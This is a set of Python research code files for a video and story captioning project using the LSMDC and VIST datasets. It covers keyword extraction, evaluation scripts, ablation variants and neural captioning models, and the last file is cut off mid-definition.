import json
import torch
import numpy as np
from tqdm import tqdm
from collections import defaultdict
from exp import ex
from tensor_utils import move_device
from path import get_dirname_from_args, get_keyword_path
from data.batcher import decode_tensor, remove_pad
def extract_keyword(model, tokenizer, dataloader,
extraction_threshold, device,
extraction_min_words):
model.eval()
threshold = extraction_threshold # prediction loss for mask_model
res = {}
ratios = []
with torch.no_grad():
for batch in tqdm(dataloader, total=len(dataloader)):
data_ids = batch['id']
batch = move_device(batch, to=device)
B = batch['sentences'].shape[0] if torch.is_tensor(batch['sentences']) else len(batch['sentences'])
targets = batch['targets']
loss, scores, ids = model(batch)
for i in range(B):
min_words = min(extraction_min_words, ids[i].shape[0])
keywords = [(key, score)
for j, (key, score) in enumerate(zip(ids[i], scores[i]))
if score < threshold or j < min_words]
keywords, score = zip(*keywords)
keywords, score = torch.Tensor(list(keywords)).to(ids[i].device), \
torch.Tensor(list(score)).to(ids[i].device).cpu().numpy().tolist()
target_len = remove_pad(targets[i], tokenizer.pad_id).shape[0] - 2 # remove cls, sep
keywords_len = remove_pad(keywords, tokenizer.pad_id).shape[0]
keywords = decode_tensor(tokenizer, keywords, split_tokens=True)
target = decode_tensor(tokenizer, targets[i])
ratios.append(keywords_len / target_len)
res[data_ids[int(i/5)]] = {'keyword': keywords, 'score': score}
ratios = np.array(ratios)
model.train()
return res, ratios
@ex.capture
def extract_and_save(key, model, tokenizer, dataloaders, data_path):
path = None
if key in data_path:
print(f"extracting keyword for {key}")
res, ratios = extract_keyword(model, tokenizer, dataloaders[key])
ratio_percentiles = [10, 20, 50, 80, 90]
ratio_percentiles = {i: np.percentile(ratios, i) for i in ratio_percentiles}
print(f"keyword ratio percentiles: {ratio_percentiles}")
path = get_keyword_path(data_path, key)
print(f"saving keyword to {path}")
with open(path, 'w') as f:
json.dump(res, f, indent=4)
return path
def extract_and_save_all(model, tokenizer, dataloaders):
extract_and_save('train', model, tokenizer, dataloaders)
extract_and_save('val', model, tokenizer, dataloaders)
extract_and_save('test', model, tokenizer, dataloaders)
```
#### File: code/metric/compare_tokenizer.py
```python
from itertools import chain
from pathlib import Path
import json
def compare(tokenizer):
path = Path('~/projects/lsmdc/data/VIST/sis/train.story-in-sequence.json').expanduser()
with open(path, 'r') as f:
data = json.load(f)['annotations']
texts = [v[0]['text'] for v in data]
orig_texts = [v[0]['original_text'] for v in data]
texts = [v.split() for v in texts]
orig_texts = [tokenizer(v.lower()) for v in orig_texts]
diff = [(i, v) for i, v in enumerate(zip(texts, orig_texts)) if len(v[0]) != len(v[1])]
print(len(diff))
return diff
def flatten_list(li):
return list(chain(*li))
def cut_apst(w):
w = w.split("'")
w = [f"'{v}" for v in w]
w[0] = w[0][1:]
return w
def cut_dot(w):
if w.endswith('.') and w != 'w' and not w.endswith('..'):
return [w[:-1], w[-1]]
else:
return [w]
def cut_dash(w):
if '--' in w and w != '--':
w = w.split("--")
w = flatten_list([['--', v] for v in w])
w = w[1:]
return w
else:
return [w]
def tok_test(s):
s = s.split()
s = flatten_list([[w[:-1], w[-1]] if w.endswith('!') else [w] for w in s])
s = flatten_list([[w[:-1], w[-1]] if w.endswith('?') else [w] for w in s])
s = flatten_list([[w[:-1], w[-1]] if w.endswith(',') and w != ',' else [w] for w in s])
s = flatten_list([cut_dot(w) for w in s])
s = flatten_list([cut_apst(w) if "'" in w and w != "'" else [w] for w in s])
s = flatten_list([cut_dash(w) for w in s])
s = [v for v in s if v != '']
s = ' '.join(s)
'''
if s[-1] == '.':
s = f"{s[:-1]} ."
'''
s = s.replace('!!!', '! ! !')
s = s.replace('!!', '! !')
s = s.replace('!?', '! ?')
s = s.replace('?!', '? !')
s = s.split(' ')
return s
```
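A quick check of the ad-hoc tokenizer above, assuming the file is importable as `compare_tokenizer`:

```python
from compare_tokenizer import tok_test

print(tok_test("we didn't go--it was raining. so sad!"))
# ['we', 'didn', "'t", 'go', '--', 'it', 'was', 'raining', '.', 'so', 'sad', '!']
```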
#### File: code/metric/normalize.py
```python
import json
from collections import defaultdict
from pathlib import Path
import argparse
from vist_tokenizer import VistTokenizer
def parse_args():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-n', '--name', default='test_results.json', type=str)
parser.add_argument('-l', '--longest', action='store_true')
args = parser.parse_args()
return args
def break_tie(li, longest=False):
if longest:
res = ''
for l in li:
if len(l) >= len(res):
res = l
else:
len_res = 9999
for l in li:
if len(l) < len_res:
res = l
len_res = len(res)
return res
def main():
args = parse_args()
path = Path('~/projects/lsmdc/data/VIST/sis').expanduser()
output = normalize(args.name, args.longest)
with open(path / f"cut_{args.name}", 'w') as f:
json.dump(output, f, indent=4)
def normalize(name, longest=False):
path = Path('~/projects/lsmdc/data/VIST/sis').expanduser() / name
with open(path, 'r') as f:
data = json.load(f)['output_stories']
albums = defaultdict(dict)
for row in data:
albums[row['album_id']]['_'.join(row['photo_sequence'])] = \
row['story_text_normalized']
# get shortest generation in album
albums = {k: break_tie(list(v.values()),
longest=longest) for k, v in albums.items()}
# tokenize
tokenizer = VistTokenizer()
albums = {k: [{'caption': v}] for k, v in albums.items()}
albums = tokenizer.tokenize(albums)
output = {'output_stories': [{'album_id': k, 'photo_sequence': [],
'story_text_normalized': v[0]}
for k, v in albums.items()]}
return output
if __name__ == '__main__':
main()
```
#### File: code/metric/test_scorer.py
```python
import json
from pathlib import Path
from collections import defaultdict
import argparse
from metric_test import Metric
from normalize import normalize
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def flatten(li):
return [item for sublist in li for item in sublist]
def parse_args():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-n', '--name', default='test_results.json', type=str)
parser.add_argument('-v', '--vist', type=bool, default=False)
parser.add_argument('-a', '--album', action='store_false')
parser.add_argument('-l', '--longest', action='store_true')
parser.add_argument('-c', '--cut', action='store_true')
parser.add_argument('-s', '--eval-set', action='store_true')
parser.add_argument('-dot', '--dot', action='store_true') # shift last dot
args = parser.parse_args()
return args
def shift_dot(hypo):
h = hypo['output_stories']
h = [{**v, 'story_text_normalized': _shift_dot(v['story_text_normalized'])}
for v in h]
return {'output_stories': h}
def _shift_dot(text):
if (not text.endswith(' .')) and text.endswith('.'):
text = text[:-1] + ' .'
return text
def break_tie(li, longest=True):
if longest:
res = ''
for l in li:
if len(l) >= len(res):
res = l
else:
len_res = 9999
for l in li:
if len(l) < len_res:
res = l
len_res = len(res)
return res
def load_file(name):
path = Path('~/projects/lsmdc/data/VIST/sis/samples/full').expanduser() / name
with open(path, 'r') as f:
hypo = json.load(f)
return hypo
def calc(hypo, album=True, longest=False):
hypo = hypo['output_stories']
if album:
res = defaultdict(list)
for v in hypo:
res[v['album_id']].append(v['story_text_normalized'])
hypo = {}
# tie breaking
for k, v in res.items():
hypo[k] = break_tie(v, longest)
else:
hypo = {f"{v['album_id']}_{v['photo_sequence']}": v['story_text_normalized'] for v in hypo}
tgt_name = 'albums' if album else 'images'
path = Path('../../').resolve() / 'data' / 'VIST' / 'sis' / f'post_test.story-in-sequence_{tgt_name}.json'
with open(path, 'r') as f:
tgt = json.load(f)
m = Metric(['cider', 'meteor', 'bleu', 'rouge'], False, use_vist=True, no_tokenizer=False)
print(m({k: (hypo[k], tgt[k]) for k in hypo.keys()}))
def main():
args = parse_args()
print(args)
if args.vist:
run_vist(args)
elif len(args.name.split('/')) > 1:
run_ckpt(args)
else:
run_lsmdc(args)
def run_vist(args):
if args.cut:
hypo = normalize(args.name, args.longest)
elif args.dot:
hypo = load_file(args.name)
hypo = shift_dot(hypo)
else:
hypo = load_file(args.name)
calc(hypo, args.album, args.longest)
def run_lsmdc(args, hypo=None):
root = Path('../../').resolve() / 'data' / 'LSMDC' / 'task1'
tgt_path = root / 'LSMDC16_annos_test_someone.csv'
tgt = {}
keys = []
with open(tgt_path, 'r') as f:
for line in f:
line = line.split('\t')
tgt[line[0].strip()] = line[-1].strip()
keys.append(line[0].strip())
set_keys = build_set(keys)
if hypo is None:
hypo_path = root / 'samples' / 'full' / args.name
with open(hypo_path, 'r') as f:
hypo = json.load(f)
if args.eval_set:
hypo_set = {str(i): ' '.join(hypo[key] for key in keys) for i, keys in set_keys.items()}
tgt_set = {str(i): ' '.join(tgt[key] for key in keys) for i, keys in set_keys.items()}
hypo, tgt = hypo_set, tgt_set
m = Metric(['cider', 'meteor', 'bleu', 'rouge'], False, use_vist=False, no_tokenizer=False)
print(m({k: (hypo[k], tgt[k]) for k in hypo.keys()}))
def build_set(keys):
res = defaultdict(list)
for key in keys:
name = key[:key.rfind('_')]
res[name].append(key)
res = {k: [(f"{k}_{i}", v2) for i, v2 in enumerate(list(chunks(v, 5)))] for k, v in res.items()}
return dict(flatten(res.values()))
def run_ckpt(args):
ckpt = Path('../../').resolve() / 'data' / 'ckpt'
dir_name = args.name.split('/')
dir_name, file_name = dir_name
dir_path = list(ckpt.glob(dir_name))
assert len(dir_path) > 0, f"nonexisting dir name {dir_name}"
dir_path = dir_path[0]
file_path = list(dir_path.glob(file_name))
assert len(file_path) > 0, f"nonexisting file name {file_name}"
file_path = file_path[0]
print(f"Loading from {file_path}")
with open(file_path, 'r') as f:
hypo = json.load(f)
hypo = dict({k: v[0] for k, v in hypo.items()})
run_lsmdc(args, hypo)
if __name__ == '__main__':
main()
```
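For reference, `build_set` groups clip ids by their movie prefix (everything before the last underscore) and chunks each movie into 5-clip evaluation sets; a toy run with hypothetical ids, assuming the file above is importable as `test_scorer` (and its local imports resolve):

```python
from test_scorer import build_set

keys = [f"movie1_{i:04d}" for i in range(7)]   # hypothetical clip ids
sets = build_set(keys)
for name, members in sets.items():
    print(name, members)
# movie1_0 holds the first five clip ids, movie1_1 the remaining two
```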
#### File: code/model/ablations.py
```python
from torch import nn
import torch.nn.functional as F
from exp import ex
from .temporal_corr import TemporalCorrGlobal
from .no_gt import NoGtSos
# from .ss_loss import calc_l2_loss
class AblationJointSS(TemporalCorrGlobal):
def forward(self, batch, **kwargs):
return self._forward(batch, **kwargs)
class AblationNoSS(TemporalCorrGlobal):
def forward(self, batch, **kwargs):
hypo, logit, target, reg_loss, stats, batch = self._forward(batch, **kwargs)
reg_loss = None
return hypo, logit, target, reg_loss, stats, batch
class AblationSplitGen(TemporalCorrGlobal):
def forward(self, batch, **kwargs):
if self.training:
self.fix_gpt(kwargs.get('epoch', 0))
hypo, logit, target, reg_loss, stats, batch = self._forward(batch, **kwargs)
reg_loss = None
return hypo, logit, target, reg_loss, stats, batch
class AblationNoPred(TemporalCorrGlobal):
def get_reg_loss(self, h, c, group_mask):
rank_loss, rank_stats = self.get_rank_loss(h, c, group_mask)
return rank_loss, rank_stats
class AblationNoMatch(TemporalCorrGlobal):
def get_reg_loss(self, h, c, group_mask):
roll_loss, roll_stats = self.get_roll_losses(h, c, group_mask)
return roll_loss, roll_stats
class AblationS(NoGtSos):
def mean_pool_text(self, o):
# BGLC
return o.mean(dim=2) # use the [sos] token only
class AblationLossL2(NoGtSos):
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
def calc_l2_loss(self, x1, x2, group_mask=None, margin=None, pool='mean', skip_idx=0):
loss = F.mse_loss(x1, x2, reduction=pool)
acc = 0
return loss, acc
def run_rank_loss(self, x1, x2, group_mask, skip_idx=0):
x1 = x1.view(-1, x1.shape[-1])
x2 = x2.view(-1, x2.shape[-1])
group_mask = group_mask.view(-1)
loss1, acc1 = self.calc_l2_loss(x1, x2, group_mask,
margin=self.margin, pool='mean',
skip_idx=skip_idx)
loss2, acc2 = self.calc_l2_loss(x2, x1, group_mask,
margin=self.margin, pool='mean',
skip_idx=-skip_idx)
return loss1, acc1, loss2, acc2
class AblationLossCycle(NoGtSos):
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
dim = self.gpt_dim
self.cycle_linears = nn.ModuleDict({
'vis_to_txt': nn.Linear(dim, dim),
'txt_to_vis': nn.Linear(dim, dim),
})
def calc_cycle_loss(self, x1, x2, group_mask=None, pool='mean', skip_idx=0):
l1 = F.mse_loss(self.cycle_linears['vis_to_txt'](x2), x1.detach(), reduction=pool)
l2 = F.mse_loss(self.cycle_linears['txt_to_vis'](x1), x2.detach(), reduction=pool)
return l1, l2
def get_rank_loss(self, h, c, group_mask, skip_idx=0):
x1 = F.normalize(h)
x2 = F.normalize(c)
l1, l2 = self.run_rank_loss(x1, x2, group_mask, skip_idx)
loss = l1 + l2
# stats = {'rank_accuracy': acc}
stats = {'loss_ttov': l1.item(), 'loss_vtot': l2.item()}
return loss, stats
def run_rank_loss(self, x1, x2, group_mask, skip_idx=0):
x1 = x1.view(-1, x1.shape[-1])
x2 = x2.view(-1, x2.shape[-1])
group_mask = group_mask.view(-1)
l1, l2 = self.calc_cycle_loss(x1, x2, group_mask, pool='mean', skip_idx=skip_idx)
return l1, l2
def get_reg_loss(self, h, c, group_mask):
loss, stats = self.get_rank_loss(h, c, group_mask)
return loss, stats
class AblationIterSS(TemporalCorrGlobal):
@classmethod
def get_args(cls):
return {
**super().get_args(),
'iter_ss': 1
}
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch,
iter_ss):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
self.iter_ss = iter_ss
self.current_epoch = -1
def fix_gpt(self, epoch):
if epoch != self.current_epoch:
if (epoch + 1) % self.iter_ss == 0:
# revert ss
if not self.net.transformer.weight_freezed:
self._fix_gpt()
self.net.transformer.weight_freezed = True
else:
self._fix_gpt(False)
self.net.transformer.weight_freezed = False
self.reset_optimizer = True
self.current_epoch = epoch
```
#### File: code/model/autoencoder.py
```python
import torch
from torch import nn
import torch.nn.functional as F
from data.batcher import make_autoencoder_batch, make_bert_batch
from tensor_utils import remove_cls_sep
from .transformer_model import TransformerModel
from .encoder import Encoder
from .decoder import Decoder
from .sparsemax import Sparsemax
from .modules import LSTMDecoder, l_n_norm
class Autoencoder(TransformerModel):
transformer_name = 'gpt2'
def __init__(self, args, transformers, tokenizer):
super(Autoencoder, self).__init__()
self.use_keyword = args.use_keyword
if self.use_keyword:
self.encoder = Encoder(args, transformers['encoder'], tokenizer)
self.decoder = Decoder(args, transformers['decoder'], tokenizer)
def make_batch(self, *args, **kwargs):
return make_autoencoder_batch(*args, **kwargs)
def forward(self, batch, **kwargs):
sentence = batch.sentences
targets = batch.targets
lengths = batch.lengths
if self.use_keyword:
keywords, keyword_lengths, scores, reg_loss = \
self.encoder(sentence, lengths)
else:
keywords, keyword_lengths, scores, reg_loss = None, None, None, None
logits = self.decoder(sentence, lengths,
keywords, keyword_lengths, scores)
return logits, targets, reg_loss, {'prob': scores.mean().item()}, keywords
class MultiLabelAutoencoder(TransformerModel):
transformer_name = 'bert'
def __init__(self, args, transformer, tokenizer):
super(MultiLabelAutoencoder, self).__init__()
self.threshold_keyword = args.get('threshold_keyword', False)
self.extraction_min_words = args.extraction_min_words
self.keyword_ratio = args.keyword_ratio
self.use_reg_loss = args.get('use_reg_loss', False)
self.net = transformer
self.net.train()
self.tokenizer = tokenizer
bert_dim = self.net.bert.config.hidden_size
# self.reduce_dim = nn.Linear(bert_dim * 2, bert_dim)
self.keyword_linear = nn.Linear(bert_dim, bert_dim)
self.use_bert = False
if not self.use_bert:
self.decoder = LSTMDecoder(self.net.bert.embeddings.word_embeddings)
self.keyword_activation = args.get('keyword_activation', 'sparsemax')
self.keyword_activation = {
'softmax': self.softmax,
'sparsemax': self.sparsemax,
'sigmoid': self.sigmoid,
'saturating_sigmoid': self.saturating_sigmoid,
}[self.keyword_activation.lower()]
self.loss_norm_n = args.get('loss_norm_n', 1)
self.reduce_dim = nn.Linear(bert_dim * 2, bert_dim)
def get_l_n_loss(self, x, lengths):
x = F.relu(x)
reg_loss = l_n_norm(x, n=self.loss_norm_n, dim=-1)
reg_loss = F.relu(reg_loss - self.extraction_min_words)
max_keyword_num = torch.max(torch.LongTensor([self.extraction_min_words]).to(lengths.device),
(lengths.float() * self.keyword_ratio).ceil().long())
max_limit_loss = F.relu(max_keyword_num.float() - l_n_norm(x, n=1, dim=-1))
reg_loss = reg_loss + max_limit_loss
return reg_loss.mean()
def keyword_activation_loss(self, x, lengths):
x = self.keyword_activation(x)
reg_loss = self.get_l_n_loss(x, lengths)
return x, reg_loss
def softmax(self, x):
x = F.softmax(x, dim=-1)
return x
def sparsemax(self, x):
mm = Sparsemax(dim=-1)
x = mm(x)
return x
def sigmoid(self, x):
x = torch.sigmoid(x)
return x
def saturating_sigmoid(self, x):
x = 1.2 * torch.sigmoid(x) - 0.1
x = x.clamp(0, 1)
return x
def make_batch(self, *args, **kwargs):
return make_bert_batch(*args, **kwargs)
def pool(self, x, dim=-1):
return x.mean(dim=dim)
def extend_attention_mask(self, input_ids, attention_mask):
if attention_mask is None:
attention_mask = torch.ones_like(input_ids)
extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)
extended_attention_mask = extended_attention_mask.to(dtype=next(self.net.bert.parameters()).dtype) # fp16 compatibility
extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
return extended_attention_mask
def get_head_mask(self):
head_mask = [None] * self.net.bert.config.num_hidden_layers
return head_mask
def get_position_embeddings(self, input_ids):
position_ids = torch.arange(input_ids.shape[1], dtype=torch.long, device=input_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
return self.net.bert.embeddings.position_embeddings(position_ids)
def keyword_thresholding(self, p, lengths):
if self.threshold_keyword:
max_keyword_num = torch.max(torch.LongTensor([self.extraction_min_words]).to(lengths.device),
(lengths.float() * self.keyword_ratio).ceil().long())
p_sorted, _ = p.sort(dim=-1, descending=True) # BC
min_vals = p_sorted.gather(dim=-1, index=(max_keyword_num - 1).unsqueeze(-1)) # keep ties
keyword_mask = (p >= min_vals)
p = p * keyword_mask.float()
return p
def mask_keyword(self, p, sentences):
# BV, BL
src = torch.FloatTensor([0]).to(p.device).view(1, 1, 1)
p = p.unsqueeze(1).expand(*sentences.shape, p.shape[-1])
temp = torch.full_like(p, 0)
sentences = sentences.unsqueeze(-1).expand(*sentences.shape, p.shape[-1])
temp = temp.scatter(dim=-1, index=sentences,
src=p)
# BLV
p = temp.sum(dim=1)
p = F.normalize(p, p=1, dim=-1)
return p
def forward(self, batch, **kwargs):
sentences = batch.sentences
targets = batch.targets
lengths = batch.lengths
attention_mask = sentences != self.tokenizer.pad_id
extended_attention_mask = self.extend_attention_mask(sentences, attention_mask)
encoder_out = self.net.bert(sentences, attention_mask=attention_mask)[0]
encoder_out = self.pool(encoder_out, dim=1) # BC
encoder_out = self.net.cls(encoder_out)
keyword_prob, reg_loss = self.keyword_activation_loss(encoder_out, lengths)
keyword_prob = self.mask_keyword(keyword_prob, sentences)
keyword_prob_t = self.keyword_thresholding(keyword_prob, lengths)
keyword_att = torch.matmul(keyword_prob_t, self.net.bert.embeddings.word_embeddings.weight)
L = sentences.shape[1]
keyword_att = self.keyword_linear(keyword_att)
if self.use_bert:
keyword_att = keyword_att.unsqueeze(1).expand(-1, L, -1)
decoder_in = keyword_att + self.get_position_embeddings(sentences)
head_mask = self.get_head_mask()
decoder_out = self.net.bert.encoder(decoder_in, extended_attention_mask,
head_mask=head_mask)[0]
logits = self.net.cls(decoder_out)
else:
dec_input, target = remove_cls_sep(targets, self.tokenizer)
dec_input = self.net.bert.embeddings.word_embeddings(dec_input)
dec_input = torch.cat((dec_input, keyword_att.unsqueeze(1).expand_as(dec_input)), dim=-1)
dec_input = self.reduce_dim(dec_input)
logits = self.decoder(keyword_att, dec_input, embedded=True)
with torch.no_grad():
stats = {
'keyword_l2': ((keyword_prob ** 2).sum(dim=-1) ** 0.5).mean().item(),
'keyword_l1': keyword_prob.sum(dim=-1).mean().item(),
'keyword>0.1': (keyword_prob > 0.1).sum(dim=-1).float().mean().item(),
'keyword>0': (keyword_prob > 0).sum(dim=-1).float().mean().item(),
}
if self.threshold_keyword:
stats = {
**stats,
'keyword_nonzero': (keyword_prob_t > 0).sum(dim=-1).float().mean().item(),
}
scores, keywords = keyword_prob.sort(dim=-1, descending=True) # BV
keywords = keywords[:, :10]
scores = scores[:, :10]
if not self.use_reg_loss:
reg_loss = None
return logits, targets, reg_loss, stats, (keywords, scores)
```
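For reference, a small self-contained sketch of two of the keyword activations used above (softmax and the saturating sigmoid) and of the L1-style "active keyword count" that `get_l_n_loss` penalizes. The tensor sizes and the 0.1 threshold are made up for illustration:
```python
import torch
import torch.nn.functional as F

def saturating_sigmoid(x):
    # Same form as in the model: 1.2 * sigmoid(x) - 0.1, clamped to [0, 1].
    return (1.2 * torch.sigmoid(x) - 0.1).clamp(0, 1)

logits = torch.randn(2, 8)  # fake (batch, vocab) keyword scores

soft = F.softmax(logits, dim=-1)
sat = saturating_sigmoid(logits)

# L1 "how many keywords are active" proxy, as penalized by get_l_n_loss.
print('softmax mass per sample:', soft.sum(dim=-1))   # always 1.0
print('saturating-sigmoid mass:', sat.sum(dim=-1))    # can exceed 1
print('entries above 0.1:', (sat > 0.1).sum(dim=-1))
```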
#### File: code/model/hybrid_dis.py
```python
from collections import OrderedDict
import torch
from torch import nn
import torch.nn.functional as F
from exp import ex
from utils import jsonl_to_json, mean
from data.batcher import make_feature_lm_batch_with_keywords, ConvertToken
from .modules import Attention, GRU
from .scn_rnn import SCNLSTM
from .transformer_model import TransformerModel
from .keyword_classifier import KeywordClassifier
'''
Currently, this implementation deviates from the original repo
in the following regards:
1. GRU instead of LSTM
2. A (deactivated) option to share in_out embeddings
Aside from the above, I tried to closely follow the given details.
'''
class HybridDis(TransformerModel):
transformer_name = 'none' # assign transformer_name = 'bert' to use BPE
model_type = 'caption'
use_keyword = False
task = 1
@classmethod
def get_args(cls):
return {
'dim': 512,
'pretrained_embedding': False,
'keyword_classification_loss': 'bce',
'keyword_top_k': 20,
'use_gt_keywords': False,
'use_word_subset': False,
'share_in_out': False,
'keyword_num': 1000,
'dropout': 0.5,
'decoder_type': 'scn',
}
@ex.capture
def __init__(self, transformer, tokenizer,
dim, keyword_num, dropout, visual_dropout, feature_names, feature_dims,
share_in_out, use_gt_keywords, use_word_subset, max_target_len,
keyword_top_k, keyword_classification_loss, pretrained_embedding,
decoder_type, normalizer_sparsity):
super(HybridDis, self).__init__()
self.eps = 1e-09
self.normalizer_alpha = None
if normalizer_sparsity == 'adaptive':
self.normalizer_alpha = nn.Parameter(torch.ones(1) * 1.2, requires_grad=True)
self.dim = dim
self.keyword_num = keyword_num
self.dropout_ratio = dropout
self.visual_dropout_ratio = visual_dropout
self.feature_names = feature_names
self.feature_dims = {k: v for k, v in feature_dims.items() if k in self.feature_names}
self.share_in_out = share_in_out
self.use_gt_keywords = use_gt_keywords
self.use_word_subset = use_word_subset
self.max_target_len = max_target_len
self.tokenizer = tokenizer
self.vocab_size = len(tokenizer)
self.k = keyword_top_k
self.keyword_loss_type = keyword_classification_loss
for feature in self.feature_names:
setattr(self, feature, FeatureEncoder(self.feature_dims[feature], self.dim))
self.encoder = nn.Linear(len(self.feature_names) * self.dim, self.dim)
self.pretrained_embedding = pretrained_embedding
self.wte_dim = 300 if self.pretrained_embedding else self.dim
self.wte = nn.Embedding(self.vocab_size, self.wte_dim)
self.context_dim = self.dim // 4
num_layers = 1
self.rnn = {
'rnn': GRU(num_layers, self.wte_dim + self.dim + self.context_dim, self.dim, dropout=self.dropout_ratio),
'scn': SCNLSTM(self.wte_dim + self.dim + self.context_dim, self.keyword_num, self.dim,
num_layers, batch_first=True, dropout=self.dropout_ratio)
}[decoder_type]
self.context_encoder = PrevEncoder(self.dim, self.context_dim)
self.dropout = nn.Dropout(self.dropout_ratio)
if self.share_in_out:
self.out = self.out_shared
else:
self.out = nn.Linear(self.dim, self.vocab_size)
self.keyword_num = len(tokenizer) if self.use_word_subset else self.keyword_num
self.keyword_classifier = KeywordClassifier(
self.wte,
self.keyword_num, self.dim, self.feature_names,
self.feature_dims,
self.dropout_ratio,
recall_k=self.k,
loss_type=self.keyword_loss_type
)
self.init_weights()
self.use_context = False
def make_batch(self, *args, **kwargs):
return make_feature_lm_batch_with_keywords(*args, **kwargs)
def epoch_update(self, epoch):
if epoch > 10:
self.use_context = True  # run_video reads self.use_context
def get_keyword_map(self, ids):
# get NV
if not self.use_word_subset:
storage = torch.zeros(ids.shape[0], len(self.tokenizer)).float().to(ids.device)
storage.scatter_(-1, ids.unsqueeze(-1), 1)
else:
# storage = torch.eye(len(self.tokenizer)).float().to(ids.device)
storage = None
return storage
def get_keyword_freq(self, batch, device):
if not self.use_word_subset:
c = batch.keyword_counter
else:
c = batch.word_counter
convert_token = ConvertToken()
c = {convert_token(self.tokenizer, k): v for k, v in c.items()}
ids, freq = zip(*c.items())
ids = torch.LongTensor(list(ids)).to(device)
freq = torch.FloatTensor(list(freq)).to(device)
t = torch.zeros(self.vocab_size).float().to(device)
t.scatter_(0, ids, freq)
t = t / (t.sum(dim=-1) + self.eps) # normalize
t.requires_grad_(False)
return t
def init_weights(self):
init_range = 0.1
for feature in self.feature_names:
getattr(self, feature).linear.weight.data.uniform_(-init_range, init_range)
if not self.share_in_out:
self.out.bias.data.fill_(0)
self.out.weight.data.uniform_(-init_range, init_range)
if self.pretrained_embedding is not None and self.pretrained_embedding:
self.wte.load_state_dict({'weight': self.tokenizer.embedding})
def out_shared(self, x):
return torch.matmul(x, self.wte.weight.t())
def generate_token(self, hypo, features, c, h, keyword, group_mask=None):
s = hypo[:, -1] # get last token
s = self.wte(s).unsqueeze(1) # B1C
s = torch.cat((features, c, s), dim=-1)
o, h = self.rnn(s, h, keyword=keyword)
o = self.dropout(o)
logits = self.out(o) # BV
return logits, h
def run_token(self, features, hypo, h, c, keyword, group_mask):
features = OrderedDict(sorted(features.items())) # canonical ordering
for feature in self.feature_names:
features[feature] = getattr(self, feature)(features[feature], h)
features = self.encoder(torch.cat(list(features.values()), dim=-1))
logits, h = self.generate_token(hypo, features, c, h, keyword, group_mask)
return h, c, logits
def run_video(self, features, c, v, L, sentences=None, sampler=None,
keyword=None, reduce_hypo=True, group_mask=None):
video = features['video']
B = video.shape[0]
empty = torch.full((B, self.vocab_size), float('-inf')).to(video.device)
sent = []
eos_flags = torch.LongTensor([0] * B).bool().to(video.device)
h = self.rnn.init_h(B, device=video.device) if hasattr(self, 'rnn') else None
c = self.rnn.init_c(B, self.context_dim, device=video.device) if hasattr(self, 'rnn') else None
s0 = sentences[:, v, 0] if sentences is not None \
else torch.Tensor([self.tokenizer.cls_id]).long().to(video.device).expand(B)
s = s0
hypo = s0.unsqueeze(-1)
for w in range(L):
if eos_flags.all():
logits = empty.clone()
else:
h, c, logits = self.run_token(features, hypo, h, c, keyword=keyword, group_mask=group_mask)
if sentences is not None: # training
s = sentences[:, v, min(L - 1, w + 1)].clone()
eos_flags = eos_flags | (sentences[:, v, min(L - 1, w + 1)] == self.tokenizer.sep_id)
else:
s, probs = sampler(logits, self.normalizer_alpha)
eos_flags = eos_flags | (logits.argmax(dim=-1) == self.tokenizer.pad_id)
hypo = torch.cat((hypo, s.unsqueeze(-1)), dim=1)
sent.append(logits)
hypo = hypo[:, 1:]
if sentences is None and reduce_hypo:
hypo = hypo[probs.argmax(dim=-1)]
else:
sent = torch.stack(sent, 1).contiguous()
c = self.context_encoder(h)
if not self.use_context:
c = torch.full_like(c.detach(), 0)
c.requires_grad_(False)
return c, sent, hypo, None, {}
def get_keyword(self, batch, features):
keyword = None
if hasattr(batch, 'keyword_masks'):
keyword = batch.word_subsets if self.use_word_subset else batch.keyword_masks
return self.keyword_classifier(keyword, features)
def process_keyword(self, batch, features):
if (not hasattr(self, 'keyword_map')) and hasattr(batch, 'keyword_map') and batch.keyword_map is not None:
self.keyword_map = self.get_keyword_map(batch.keyword_map)
if (not hasattr(self, 'keyword_freq')) and hasattr(batch, 'word_counter') and batch.keyword_counter is not None:
self.keyword_freq = self.get_keyword_freq(batch, batch.video.device)
keywords, reg_loss, stats = self.get_keyword(batch, features)
keywords = keywords.detach()
if self.use_gt_keywords:
if not self.use_word_subset:
if hasattr(batch, 'keyword_masks'):
keywords = batch.keyword_masks.float()
else:
if hasattr(batch, 'word_subsets'):
keywords = batch.word_subsets.float()
return keywords, stats, reg_loss
def forward(self, batch, **kwargs):
# BVLC, BVL
sent_gt = batch.sentences if hasattr(batch, 'sentences') else None
features = {k: val for k, val \
in {f: getattr(batch, f) for f \
in self.feature_names}.items()}
keywords, stats, reg_loss = self.process_keyword(batch, features)
if hasattr(batch, 'sentences'):
stats = {**stats, 'sentence_len': (batch.sentences != self.tokenizer.pad_id).float().sum(dim=-1).mean().item()}
res = []
vid_stats = []
losses = []
B, V = batch.video.shape[:2]
L = batch.sentences.shape[2] if hasattr(batch, 'sentences') else self.max_target_len
for v in range(V):
feature = {k: val[:, v] for k, val in features.items()}
c = self.rnn.init_c(B, self.context_dim, device=batch.video.device) if hasattr(self, 'rnn') else None
keyword = keywords[:, v] if keywords is not None else None
c, sent, _, small_loss, vid_stat = self.run_video(feature, c, v, L,
sentences=sent_gt, keyword=keyword,
group_mask=batch.group_mask[:, v],
sampler=kwargs.get('sampler', None))
losses.append(small_loss)
vid_stats.append(vid_stat)
res.append(sent) # BLV
vid_stats = {k: mean(v) for k, v in jsonl_to_json(vid_stats).items()}
stats = {**stats, **vid_stats}
del batch.sentences # for generation
small_loss = None if losses[0] is None else mean(losses)
if reg_loss is None:
reg_loss = small_loss
elif small_loss is not None:
reg_loss = reg_loss + small_loss
return torch.stack(res, 1).contiguous(), batch.targets, reg_loss, stats, batch
class FeatureEncoder(nn.Module):
def __init__(self, video_dim, dim):
